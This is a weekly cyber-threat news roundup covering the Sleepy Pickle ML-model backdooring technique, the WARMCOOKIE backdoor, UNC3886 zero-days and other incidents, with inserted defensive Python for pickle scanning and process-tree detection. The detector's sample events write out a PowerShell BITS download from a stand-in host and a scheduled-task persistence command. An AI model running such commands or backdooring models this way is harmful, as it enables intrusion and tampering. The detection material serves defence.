Weekly Cyber Reports

This Week in Cyber 21st June 2024

Latest news and views from our Cyber Analysts

Written by Team Nucleus

Written on 20th June, 2024


Analyst Insight

This week's cybersecurity landscape presents several noteworthy events. The "Sleepy Pickle" attack method, targeting machine learning models via the Pickle serialisation format, highlights the growing sophistication of supply chain threats. The WARMCOOKIE backdoor campaign, which preys on job seekers, demonstrates the persistent use of phishing to deploy malware. The arrest of a key figure in the Scattered Spider cybercrime group marks significant progress in combating high-profile hackers. Microsoft's decision to delay the launch of its Recall feature amid privacy concerns underscores the importance of prioritising security in new technologies.


Lastly, the long-term espionage campaign by UNC3886, exploiting zero-day vulnerabilities in Fortinet and VMware devices, emphasises the critical need for robust defence mechanisms against advanced persistent threats. These incidents collectively illustrate the dynamic challenges in cybersecurity and the ongoing need for vigilant, proactive security measures.


Machine Learning Models targeted by new "Sleepy Pickle" Technique

A new attack method called "Sleepy Pickle" has been discovered by Trail of Bits, targeting machine learning (ML) models. This technique exploits the Pickle format, commonly used to package and distribute ML models, to corrupt them and pose a significant supply chain risk. By embedding a malicious payload into a "pickle" file and delivering it through methods like phishing or supply chain attacks, hackers can execute harmful code when the file is opened.


This enables them to insert backdoors, control outputs, or tamper with data, leading to altered model behaviour and potentially dangerous outcomes. Trail of Bits emphasises that Sleepy Pickle allows attackers to maintain hidden access to ML systems, avoiding detection when the compromised pickle file is loaded. This method is more effective than directly uploading a malicious model, as it can change model behaviour or output without needing to trick users into downloading and running the files.
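The reason a pickle file can run code when it is opened is that the format is a small stack-machine program: opcodes such as GLOBAL/STACK_GLOBAL import any Python callable by name and REDUCE calls it during `load()`. A weights file has no legitimate reason to contain those opcodes, so a loader can check for them before anything executes. The following is an added example (not Trail of Bits' tooling and not code from the original post) using only the standard library: `scan_pickle` disassembles the byte stream with `pickletools.genops` without executing it, and `AllowlistUnpickler` refuses any import that is not explicitly permitted. The two sample pickles are constructed here; the `OrderedDict` one stands in for any pickle that imports and calls a callable, which is the same opcode pattern a malicious payload needs.

```python
import collections
import io
import pickle
import pickletools

# Opcodes through which a pickle can import a Python callable and invoke it
# while the file is being loaded. Plain tensors, lists and dicts never need them.
CODE_EXECUTING_OPCODES = {
    "GLOBAL", "STACK_GLOBAL",         # import a callable by module and name
    "REDUCE", "INST", "OBJ",          # call it
    "NEWOBJ", "NEWOBJ_EX", "BUILD",   # construct objects / call __setstate__
}


def scan_pickle(data: bytes) -> list[str]:
    """List the code-executing opcodes in a pickle WITHOUT executing it.

    pickletools.genops only parses the opcode stream; nothing is imported or
    called, so it is safe to run on untrusted input.
    """
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in CODE_EXECUTING_OPCODES]


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that resolves globals only from an explicit allowlist."""

    def __init__(self, stream, allowed: set[tuple[str, str]]):
        super().__init__(stream)
        self.allowed = allowed

    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode; refusing here blocks the
        # import before REDUCE can ever call the callable.
        if (module, name) not in self.allowed:
            raise pickle.UnpicklingError(f"refused global {module}.{name}")
        return super().find_class(module, name)


def triage(data: bytes, allowed: set[tuple[str, str]]) -> dict:
    """Scan first, then load under the allowlist; report what happened."""
    result = {"opcodes": scan_pickle(data), "loaded": False, "error": None}
    try:
        result["object"] = AllowlistUnpickler(io.BytesIO(data), set(allowed)).load()
        result["loaded"] = True
    except Exception as exc:  # any refusal or malformed stream ends up here
        result["error"] = str(exc)
    return result


# --- constructed samples (not real model files) ---------------------------
def benign_weights() -> bytes:
    """A pickle made only of containers and floats: no imports, no calls."""
    return pickle.dumps({"layer1.weight": [0.1, -0.2], "layer1.bias": [0.0]})


def class_bearing_sample() -> bytes:
    """A pickle that imports a class and calls it on load (OrderedDict here)."""
    return pickle.dumps(collections.OrderedDict(a=1))


if __name__ == "__main__":
    print("benign  :", triage(benign_weights(), set()))
    print("class   :", triage(class_bearing_sample(), set()))
    print("allowed :", triage(class_bearing_sample(), {("collections", "OrderedDict")}))
```

In practice the allowlist holds exactly the classes a given model format needs (and nothing from `os`, `subprocess`, `builtins` or similar), and a file whose scan shows REDUCE against an unexpected module is quarantined rather than loaded. Formats that do not embed executable opcodes at all, such as safetensors, remove the problem entirely.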


WARMCOOKIE, A Campaign Targeting Job Seekers

A new campaign has been revealed, one that targets job seekers with a Windows-based backdoor named WARMCOOKIE. This campaign uses recruitment-themed lures to trick users into downloading malicious software. According to Elastic Security Labs, WARMCOOKIE is designed to scout victim networks and deploy additional malicious payloads. Each sample of the backdoor is compiled with a hard-coded command-and-control IP address and an RC4 key.


The phishing emails, posing as job opportunities from firms like Hays and Michael Page, prompt recipients to click a link and solve a CAPTCHA challenge, which then downloads a JavaScript file. This script runs PowerShell to load WARMCOOKIE, which uses the Background Intelligent Transfer Service (BITS) for downloading. WARMCOOKIE establishes persistence via a scheduled task and performs anti-analysis checks to avoid detection. It captures host information, reads and writes files, executes commands, and takes screenshots, posing a significant threat to users globally.
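The infection chain described above (a downloaded JavaScript file, a script host launching PowerShell, a BITS download, then a scheduled task for persistence) is detectable from ordinary process-creation telemetry because each step is a parent/child relationship. The following is an added example, not Elastic Security Labs' detection logic, that walks a process tree and flags PowerShell processes whose ancestry includes `wscript.exe`/`cscript.exe`, then adds indicators for BITS usage in the command line and for a `schtasks /Create` descendant. The event records are constructed to mirror the shape of Sysmon event ID 1 / EDR process events; the paths and command lines in them are made up for the example.

```python
from collections import defaultdict

# Constructed process-creation events (not real WARMCOOKIE telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\job_offer.js"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmd": r"powershell.exe -NoProfile -Command Start-BitsTransfer "
            r"-Source http://example.invalid/stage -Destination C:\ProgramData\updater.exe"},
    {"pid": 400, "ppid": 300, "image": "schtasks.exe",
     "cmd": r"schtasks.exe /Create /SC MINUTE /MO 10 /TN Updater /TR C:\ProgramData\updater.exe"},
    # A benign admin chain: explorer -> powershell -> schtasks /Query
    {"pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmd": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"pid": 600, "ppid": 500, "image": "schtasks.exe", "cmd": "schtasks.exe /Query /TN Backup"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BITS_MARKERS = ("start-bitstransfer", "bitsadmin")


def build_index(events):
    """Index events by pid and by parent pid for tree walks."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    return by_pid, children


def ancestors(pid, by_pid):
    """Yield parent, grandparent, ... until the root or an unknown pid."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)            # guards against pid reuse loops in real data
        parent = by_pid[pid]["ppid"]
        if parent not in by_pid:
            return
        yield by_pid[parent]
        pid = parent


def descendants(pid, children):
    """Yield every process below pid, depth first."""
    stack = list(children[pid])
    while stack:
        e = stack.pop()
        yield e
        stack.extend(children[e["pid"]])


def detect_chains(events):
    """Return one finding per PowerShell process spawned under a script host."""
    by_pid, children = build_index(events)
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        host = next((a for a in ancestors(e["pid"], by_pid)
                     if a["image"].lower() in SCRIPT_HOSTS), None)
        if host is None:
            continue                      # PowerShell from explorer/cmd is normal
        indicators = ["script-host-spawned-powershell"]
        if any(m in e["cmd"].lower() for m in BITS_MARKERS):
            indicators.append("bits-download")
        for d in descendants(e["pid"], children):
            if d["image"].lower() == "schtasks.exe" and "/create" in d["cmd"].lower():
                indicators.append("scheduled-task-persistence")
        findings.append({"pid": e["pid"], "script_host_pid": host["pid"],
                         "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in detect_chains(SAMPLE_EVENTS):
        print(f)
```

The first indicator alone (a script host launching PowerShell) is enough to alert on in most environments; the BITS and scheduled-task indicators raise the severity and give the responder the persistence artefact to remove. Monitoring BITS job creation and scheduled-task registration events directly would catch the same stages if the process tree is broken by injection.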


British Man Alleged To Be Ringleader of Scattered Spider Group Arrested

A 22-year-old man has been arrested after being accused of being the ringleader of the notorious Scattered Spider cybercrime group. Scattered Spider has been responsible for a number of high-profile hacks including DoorDash, Twilio and Mailchimp. Sources from the investigation claim that the individual is Tyler Buchanan from Dundee. The individual was arrested by Spanish police in Palma de Mallorca while trying to board a flight to Italy. He is the second member of Scattered Spider to be arrested after a 19-year-old from Florida was charged earlier this year by U.S. authorities.


Microsoft Delays Recall Release Date

Microsoft recently announced its new Recall product, to be included as part of Windows 11. The AI-powered tool was met with serious criticism over what many in the industry called serious security oversights. The Recall feature was designed to take screenshots of a user's PC periodically and then train an internal AI on the images. This AI would then be able to provide a tailored experience to the end user. While Microsoft has attempted to temper concerns by clarifying that the raw data would be encrypted and only made accessible when the user authenticates, others have pointed out serious problems in early versions that already show methods of bypassing authentication.


Microsoft has come under growing scrutiny for security shortfalls in recent years, which has led to a generally cautious approach when it comes to security. While this security-centric approach has applied to many of Microsoft's decisions, it seemed to slip past for the development of Recall. As we covered last week, changes were made to the security and the product was made opt-in. Now Microsoft has delayed the launch of the feature entirely. Specific dates have yet to be released for the renewed release date, which was meant to have been the 18th of June.


Fortinet, VMware and 0-Days Exploited in Long-Term Campaign

A cyber espionage group, UNC3886, has been exploiting zero-day vulnerabilities in Fortinet, Ivanti, and VMware devices to infiltrate and maintain access to targeted environments. According to Mandiant researchers, the group uses multiple persistence mechanisms, including network devices, hypervisors, and virtual machines, to ensure continued access even if some layers of their attack are detected and removed.


UNC3886 has been exploiting flaws such as CVE-2022-41328 (Fortinet FortiOS), CVE-2022-22948 (VMware vCenter), and CVE-2023-20867 (VMware Tools) to deploy backdoors and obtain credentials. They have targeted a wide range of industries including government, telecommunications, technology, aerospace, and energy, particularly in North America, Southeast Asia, and Oceania. Their sophisticated techniques include using rootkits like Reptile and Medusa, and backdoors such as MOPSLED and RIFLESPINE, which leverage trusted services like GitHub and Google Drive for command-and-control operations. These methods allow them to evade detection and spy on victims for extended periods.

